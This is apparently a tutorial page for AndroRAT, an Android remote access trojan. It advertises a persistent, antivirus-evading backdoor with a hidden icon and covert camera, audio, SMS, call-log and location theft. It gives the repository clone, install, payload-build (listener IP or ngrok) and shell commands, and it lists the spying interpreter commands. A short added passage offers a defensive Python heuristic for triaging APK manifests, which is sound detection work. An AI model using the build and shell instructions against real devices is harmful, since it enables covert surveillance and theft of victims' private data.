AndroRAT, short for Android Remote Administration Tool, is software that allows remote access to and control of an Android device. Developed in Java for the client side and Python for the server side, AndroRAT is a powerful tool for gaining access to sensitive information on an Android device.
AndroRAT is compatible with Android versions 4.1 (Jelly Bean) to 9.0 (Oreo) (API 16 to API 28), and also works on Android 10 (Q) but with some unstable interpreter commands.
AndroRAT offers a wide range of features that make it a powerful remote administration tool. Some of its key features include:
- Full persistent backdoor
- Fully undetectable by any antivirus scanner (VirusTotal)
- Invisible icon on install
- Lightweight APK that runs 24/7 in the background
- App starts automatically on boot up
- Can record audio, video, and take pictures from both cameras
- Browse call logs and SMS logs
- Get current location, SIM card details, IP, and MAC address of the device
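For defenders, the features above leave recognizable traces in an app's decoded AndroidManifest.xml, which can be checked during APK triage. The following is an added example, not code from AndroRAT or from the original page; the permission mapping, the scoring threshold, the function name triage_manifest and the sample manifest are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

NAME = "{http://schemas.android.com/apk/res/android}name"

# Assumed mapping: features listed above -> standard Android permissions.
FEATURE_PERMISSIONS = {
    "android.permission.RECEIVE_BOOT_COMPLETED": "start on boot",
    "android.permission.CAMERA": "pictures and video",
    "android.permission.RECORD_AUDIO": "audio recording",
    "android.permission.READ_SMS": "SMS logs",
    "android.permission.READ_CALL_LOG": "call logs",
    "android.permission.ACCESS_FINE_LOCATION": "current location",
    "android.permission.READ_PHONE_STATE": "SIM card details",
}

# Constructed sample: a decoded AndroidManifest.xml, not taken from a real APK.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sample">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application>
    <activity android:name=".MainActivity"/>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

def triage_manifest(manifest_xml):
    """Return the manifest traits that match the feature list above."""
    root = ET.fromstring(manifest_xml)
    requested = {p.get(NAME) for p in root.iter("uses-permission")}
    matched = sorted(requested & set(FEATURE_PERMISSIONS))
    # A receiver registered for BOOT_COMPLETED restarts the app after reboot.
    boot = any(a.get(NAME) == "android.intent.action.BOOT_COMPLETED"
               for r in root.iter("receiver") for a in r.iter("action"))
    # No LAUNCHER category on any activity means no icon in the app drawer.
    launcher = any(c.get(NAME) == "android.intent.category.LAUNCHER"
                   for tag in ("activity", "activity-alias")
                   for act in root.iter(tag) for c in act.iter("category"))
    return {
        "matched_permissions": matched,
        "boot_receiver": boot,
        "launcher_icon": launcher,
        # Assumed threshold: boot persistence, no icon, 3+ sensitive permissions.
        "suspicious": boot and not launcher and len(matched) >= 3,
    }
```

Calling triage_manifest(SAMPLE_MANIFEST) flags the constructed sample; a manifest that declares a launcher activity is not flagged by this heuristic, so treat the result as a triage hint and not as a verdict.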
To use AndroRAT, you will need to have Python 3 and Java (or Android Studio) installed on your computer.
Installing AndroRAT is a straightforward process that can be done by following these steps:
- Clone the repository using the command: git clone https://github.com/karma9874/AndroRAT.git
- Change the directory to AndroRAT: cd AndroRAT
- Install the requirements: pip install -r requirements.txt
Note: If you are using Git Bash on Windows and you get the error “unable to create file: Filename too long,” you can work around it by setting core.longpaths to true. You can do this by running the command: git config --system core.longpaths true
You must run Git Bash with administrator privileges.
Once AndroRAT is installed, you can use it in two different modes: Build and Shell.
Build mode: This mode allows you to build the APK file that will be used to install the AndroRAT client on the target device. You can use the command “python3 androRAT.py --build --ngrok” to build the APK and set the listener, or “python3 androRAT.py --build -i 192.169.x.x -p 8000” to build the APK with a specific IP and port.
Shell mode: This mode allows you to get an interactive shell of the device and run various commands to retrieve information from the device. You can use the command “python3 androRAT.py --shell -i 192.169.x.x -p 8000” to start the shell.
Commands that can run on the interpreter
AndroRAT offers a wide range of commands that can be run on the interpreter to retrieve information from the target device. Some of these commands include:
- deviceinfo: Returns basic info of the device
- camList: Returns camera ID
- takepic [cameraID]: Takes a picture from the camera
- startVideo [cameraID]: Starts recording a video
- stopVideo: Stops recording a video and returns the video file
- startAudio: Starts recording audio
- stopAudio: Stops recording audio
- getSMS [inbox|sent]: Returns inbox SMS or sent SMS in a file